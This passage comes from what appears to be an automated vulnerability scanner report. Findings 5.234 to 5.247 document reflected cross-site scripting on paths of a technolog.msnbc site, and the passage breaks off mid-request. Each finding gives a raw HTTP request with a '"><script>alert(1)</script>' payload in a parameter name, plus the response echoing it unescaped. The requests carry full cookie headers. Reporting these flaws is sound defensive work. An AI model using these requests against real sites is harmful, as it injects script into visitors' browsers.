This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /app-store?de647"><script>alert(1)</script>42a1c3fcb72=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 18:54:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 166597

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/app-store?de647"><script>alert(1)</script>42a1c3fcb72=1&nvo=0&23078215|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.234. http://technolog.msnbc.redacted/blackberry [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /blackberry

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71720"><script>alert(1)</script>843771bf362 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blackberry?71720"><script>alert(1)</script>843771bf362=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:58:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120997

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/blackberry?71720"><script>alert(1)</script>843771bf362=1&nvo=0&21198316|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.235. http://technolog.msnbc.redacted/ces-2011 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /ces-2011

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61aa0"><script>alert(1)</script>3a7cba410e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ces-2011?61aa0"><script>alert(1)</script>3a7cba410e1=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:58:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117324

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/ces-2011?61aa0"><script>alert(1)</script>3a7cba410e1=1&nvo=0&33848033|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.236. http://technolog.msnbc.redacted/citizen-gamer [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /citizen-gamer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a859"><script>alert(1)</script>8ee81155fd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /citizen-gamer?1a859"><script>alert(1)</script>8ee81155fd4=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 02:44:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 153941

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/citizen-gamer?1a859"><script>alert(1)</script>8ee81155fd4=1&nvo=0&22333736|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.237. http://technolog.msnbc.redacted/facebook [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /facebook

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28f76"><script>alert(1)</script>f73888e7cc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook?28f76"><script>alert(1)</script>f73888e7cc2=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 02:38:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127240

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/facebook?28f76"><script>alert(1)</script>f73888e7cc2=1&nvo=0&21127915|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.238. http://technolog.msnbc.redacted/featured [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /featured

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18c2b"><script>alert(1)</script>03f1adeb751 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /featured?18c2b"><script>alert(1)</script>03f1adeb751=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:39:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139069

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/featured?18c2b"><script>alert(1)</script>03f1adeb751=1&nvo=0&20126748|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.239. http://technolog.msnbc.redacted/google [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /google

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71cf2"><script>alert(1)</script>12874fc86d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /google?71cf2"><script>alert(1)</script>12874fc86d7=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:45:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132421

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/google?71cf2"><script>alert(1)</script>12874fc86d7=1&nvo=0&21222761|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.240. http://technolog.msnbc.redacted/internet [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /internet

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeb87"><script>alert(1)</script>a704b07fdd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /internet?aeb87"><script>alert(1)</script>a704b07fdd2=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:49:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149188

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/internet?aeb87"><script>alert(1)</script>a704b07fdd2=1&nvo=0&21598692|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.241. http://technolog.msnbc.redacted/ipad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /ipad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc4d5"><script>alert(1)</script>6ef19b0523 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ipad?cc4d5"><script>alert(1)</script>6ef19b0523=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:43:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132805

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/ipad?cc4d5"><script>alert(1)</script>6ef19b0523=1&nvo=0&21581306|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.242. http://technolog.msnbc.redacted/iphone [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /iphone

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d48e"><script>alert(1)</script>7c0d864a257 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iphone?6d48e"><script>alert(1)</script>7c0d864a257=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:45:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129223

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/iphone?6d48e"><script>alert(1)</script>7c0d864a257=1&nvo=0&21133716|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.243. http://technolog.msnbc.redacted/itunes [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /itunes

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 658d8"><script>alert(1)</script>b143555169b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /itunes?658d8"><script>alert(1)</script>b143555169b=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 02:59:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 136791

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/itunes?658d8"><script>alert(1)</script>b143555169b=1&nvo=0&22508079|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.244. http://technolog.msnbc.redacted/microsoft [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /microsoft

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce941"><script>alert(1)</script>7e4339e6fe9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /microsoft?ce941"><script>alert(1)</script>7e4339e6fe9=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 18:53:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 149069

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/microsoft?ce941"><script>alert(1)</script>7e4339e6fe9=1&nvo=0&22451366|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.245. http://technolog.msnbc.redacted/motion-controls [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /motion-controls

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78079"><script>alert(1)</script>78bad224f9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /motion-controls?78079"><script>alert(1)</script>78bad224f9c=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=299
Date: Sun, 30 Jan 2011 03:05:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 176922

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/motion-controls?78079"><script>alert(1)</script>78bad224f9c=1&nvo=0&24435536|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.246. http://technolog.msnbc.redacted/online-privacy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /online-privacy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edf78"><script>alert(1)</script>dfde2d718a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /online-privacy?edf78"><script>alert(1)</script>dfde2d718a=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: jt_time=1296350377678; CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; P1=01||,USDC0001|1||WRC|||||||; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; P2=pi6=20026; s_cc=true; CC=US; TZM=-360; MUID=DC63BAA44C3843F38378B4BB213E0A6F; s_nr=1294942856289-Repeat; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; __qca=P0-161320755-1294800573610; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/html
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:01:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139441

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog</title>
<meta n
...[SNIP]...
<a class="vine-customContent-moreLink" href="/online-privacy?edf78"><script>alert(1)</script>dfde2d718a=1&nvo=0&24238410|a|nu|30|1|t|a|0=12">
...[SNIP]...

5.247. http://technolog.msnbc.redacted/science [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://technolog.msnbc.redacted
Path:   /science

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a821"><script>alert(1)</script>b786dcb3635 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /science?1a821"><script>alert(1)</script>b786dcb3635=1 HTTP/1.1
Host: technolog.msnbc.redacted
Accept: */*
Accept-Language: en
